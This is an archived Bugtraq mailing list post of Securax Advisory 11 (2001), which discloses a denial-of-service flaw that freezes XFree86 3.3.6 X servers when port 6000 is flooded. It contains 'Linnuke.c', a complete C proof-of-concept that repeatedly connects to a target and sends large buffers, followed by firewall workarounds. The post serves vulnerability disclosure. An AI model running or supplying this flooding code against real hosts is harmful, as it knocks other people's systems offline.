Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Securax Advisory 11

From: incubus <incubus () SECURAX ORG>
Date: Mon, 1 Jan 2001 15:50:37 +0100
============================================================================
=
Securax-SA-11                                               Security
Advisory
belgian.networking.security
Dutch
============================================================================
=
Topic:          X-windows can be caused to freeze.
Announced:      2000-12-26
Affects:        XFree86 Version 3.3.6 / X Window System [on SuSE 6.4]
                Other versions not tested.
============================================================================
=



Note: This  entire  advisory has been based upon trial and error results.
We
      can not ensure the information below is 100% correct being that we
have
      no  source  code  to audit.  This document is subject to change
without
      prior notice.

      If you happen to find more information or problems concerning the
below
      problem  or  further  varients please contact me on the following
email
      root () htw zzn com (or ilja () securax org), or you can contact  the
securax
      info () securax org.

I.  Problem Description
-----------------------

When a large amount of characters are send to the X-windows deamon (port
6000
), X-windows  will become laggy  for a few  secondes, so if one  would send
a
lot of characters to it, in a  continious loop, the server will  freeze!,
the
only thing that works as far as I know to get X back to work is a reboot.

II. Impact
----------

X-windows servers can be caused to be laggy and even to freeze, the code in
this advisory is proof of concept code for this DoS.

/* --| BOF |-- */

/* Linnuke.c (DoS)
 *
 * written by R00T-dude
 *
 * first of all, why the lame name
 * remember in the "good old days" the winnuke.c
 * well this gives about the same effect on linux
 * and probably any other form of unix that has
 * X-windows port (6000) open.
 *
 * I found this when I was playing around with
 * this stresstool I was coding, I noticed my
 * X-win became pretty laggy when I sended 9000 A's
 * to port 6000, so I started coding on some
 * easy poc code for X-win and well, euh, ...
 * X-win FROZE !!!, so far all you can do to
 * get X to work again is reboot.
 *
 * In no way, form or shape can I nor the securax crew
 * be held responsible for any use and/or misuse of this
 * code.
 *
 * greetz to: |ncubus, f0bic, F_F, nostalg1c, |vorlon, cicer0,
 * t-omicron, [tosh], demongirl, zym0t1c,segfau|t, so many others I forgot
 *
 */

#include <stdio.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <string.h>

main(int argc, char **argv)
{
 int sock, conn, i, b;
 char buff[10000];
 struct sockaddr_in sin;
 struct hostent *hp;

 for(i=0; i<9000; i++)
 {
 strcat(buff, "\x41");  /* SHELLCODE ?? :) */
 }
 strcat(buff, "\n");

 if( (hp=gethostbyname(argv[1])) == NULL)
 {
  fprintf(stderr, "Gethostbyname() !"); exit(0);
 }

 for(b=0; b < b +1; b++)
 {
  sock = socket(AF_INET, SOCK_STREAM, 0);
  if (sock < 0)
  {
   fprintf(stderr, "Socket() !\n");  exit(sock);
  }
  sin.sin_family = AF_INET;
  sin.sin_port = 6000;
  sin.sin_addr.s_addr = inet_addr(argv[1]);

  conn = connect(sock, (struct sockaddr *)&sin, sizeof(sin));
 if (conn < 0)
  {
   printf("Connect() !\n");
   /* don't exit(); or the loop will stop */
  }

  send(sock, buff, sizeof(buff), 0);
  close(sock);
 }
}

/* --| EOF |-- */

III. possible workarounds
-------------------------

possible workarounds :: - don't use X, who needs it anyway
   - close the X-win port
   - filter the X-win port with a decent firewall
     (however, you can still be Dossed (local))
   - use windows (euh, nevermind)

IV credits
----------

thx go out to : Incubus for testing
greetz go out to :|ncubus, f0bic, F_F, nostalg1c, |vorlon, cicer0,
t-omicron,
                  [tosh], demongirl, zym0t1c,segfau|t, so many others I
forgot

-R00T-dude(root () htw zzn com or ilja () securax org).
============================================================================
=
For more information
ilja () securax org
Website
http://www.securax.org
Advisories/Text
http://www.securax.org/pers
----------------------------------------------------------------------------
-
Previous By Date Next
Previous By Thread Next

Current thread: